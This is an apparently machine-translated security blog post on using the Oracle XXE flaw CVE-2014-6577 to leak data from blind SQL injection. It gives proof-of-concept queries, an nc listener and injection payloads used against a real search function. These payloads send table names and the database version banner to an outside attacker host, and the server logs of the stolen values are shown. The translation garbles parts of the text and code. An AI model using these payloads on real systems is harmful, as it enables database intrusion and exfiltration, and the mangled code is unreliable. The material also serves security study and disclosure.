Crackershi · 2015/05/12 16:24
0 x00 preface
You are probably familiar with SQL injection and XML entity injection (XXE for short). This article mainly discusses a way to obtain data remotely in the presence of ORACLE blind injection. In fact, the UTL_HTTP remote fetch method is similar, but the principle is different.
0x01 Vulnerability Brief Analysis
Cve-2014-6577, which Oracle patched earlier this year, is known to affect the scope of the XXE vulnerability:
11.2.0.3, 11.2.0.4, 12.1.0.1, 12.1.0.2, does not exclude those versions that are not supported by Oracle also have this vulnerability. An attacker can trigger the XML interpreter to send an HTTP or FTP request by constructing an SQL statement, posing the following possible threats.
- The data reveal that
- SSRF
- Port scanning
- Denial of service attacks.
And so on…
0x02 Vulnerability exploited
One use of POC given in the literature:
On the remote host, listen for port 21 using NC. When connected, enter 220
#! html select extractvalue(xmltype('<? The XML version = "1.0" encoding = "utf-8"? > <! DOCTYPE root [ <!ENTITY % remote SYSTEM "ftp://'||user||':[email protected]/test"> %remote; %param1; ] >'),'/l') from dual;Copy the codeand
#! bash [[email protected]httpd]# busybox nc -vvlp 21 listening on [::]:21 ... Connect to [: FFFF :11.11.11.11]:21 from [:: FFFF :22.22.22.22]:37040 ([:: FFFF: 22.22.22.22]:37040) 220 USER XXXX _WEB_ XXXX 220 PASS bar ^Csent 8, RCVD 33 punt!Copy the codeORACLE reports the following error while disconnecting
Will transform the given POC, FTP request into HTTP,
ORA - 31000: resources' ftp://XXXX_WEB_XXXX:[email protected]
ora-06512: at "sys. XMLTYPE", line 310
ora-06512: at line 1 …………Copy the codeand
#! html select extractvalue(xmltype('<? The XML version = "1.0" encoding = "utf-8"? > <! [<! DOCTYPE root ENTITY % remote SYSTEM "http://11.11.11.11/ '| | user | |'" > % remote; % param1;] >'),'/l') from dualCopy the codeThe request can be received in the HTTP log without starting nc or FTP server:
#! Bash 22.22.22.22 -- [27/Apr/2015:07:56:53 -0400] "GET /XXXX_WEB_XXXX HTTP/1.0" 404 294 "-" -"Copy the code0x03 Vulnerability Combat
SQL injection vulnerability exists in a search function
It can be determined that there is blind annotation, and the database can be basically determined as Oracle
And (select 1 from dual) '%' and (select 1 from dual) '%'=' %'and (select 1 from dual) '%'=' %'Copy the codeThe server receives the following request:
#! html XXX%'and 1=(select extractvalue(xmltype('<? The XML version = "1.0" encoding = "utf-8"? > <! DOCTYPE root [ <! The ENTITY % remote SYSTEM "http://11.11.11.11/ '| | (SELECT TABLE_NAME FROM (SELECT ROWNUM AS R, TABLE_NAME FROM USER_TABLES) WHERE R=1)||'"> %remote; %param1;] >'),'/l') from dual) and '%'='Copy the codeand
GET /EC_COMP_BINARY_INFO HTTP/1.0" 404 297 "-"Copy the codeIt can also be constructed to return several results at a time
The server received the following request:
For results with whitespace or other special characters, Oracle does not automatically encode the URL, so you can use Oracle’s utl_raw. Cast_to_raw () function to convert the result to HEX.
22.22.22.22 -- [27/Apr/ 2015:23:12:01-0400] "GET /EC_COMP_BINARY_INFO////EC_COMP_BINARY_MAPPING HTTP/1.0" 404 323 "- "-"Copy the codeand
#! sql XXX%'and 1=(select extractvalue(xmltype('<? The XML version = "1.0" encoding = "utf-8"? > <! DOCTYPE root [ <! The ENTITY % remote SYSTEM "http://11.11.11.11/ '| | (SELECT utl_raw. Cast_to_raw (BANNER) FROM (SELECT ROWNUM AS R, BANNER FROM v$version) WHERE R=1)||'////'||(SELECT utl_raw.cast_to_raw(BANNER) FROM (SELECT ROWNUM AS R,BANNER FROM v$version) WHERE R=2)||'"> %remote; %param1;] >'),'/l') from dual) and '%'='Copy the codeRequests received:
Can be obtained by HEX decoding
/Oracle Database 11g Enterprise Edition Release 11.2.0.2.0-64bit Production////PL/SQL Release 11.2.0.2.0 - Production [28/Apr/ 2015:03:50:16-0400] /4F7261636C652044617461626173652031316720456E74657270726973652045646974696F6E2052656C656173652031312E322E302E322E30202D2 036346269742050726F64756374696F6E////504C2F53514C2052656C656173652031312E322E302E322E30202D2050726F64756374696F6E HTTP/1.0" 404 510 "-" "Copy the codeReferences:
https://blog.netspi.com/advisory-xxe-injection-oracle-database-cve-2014-6577/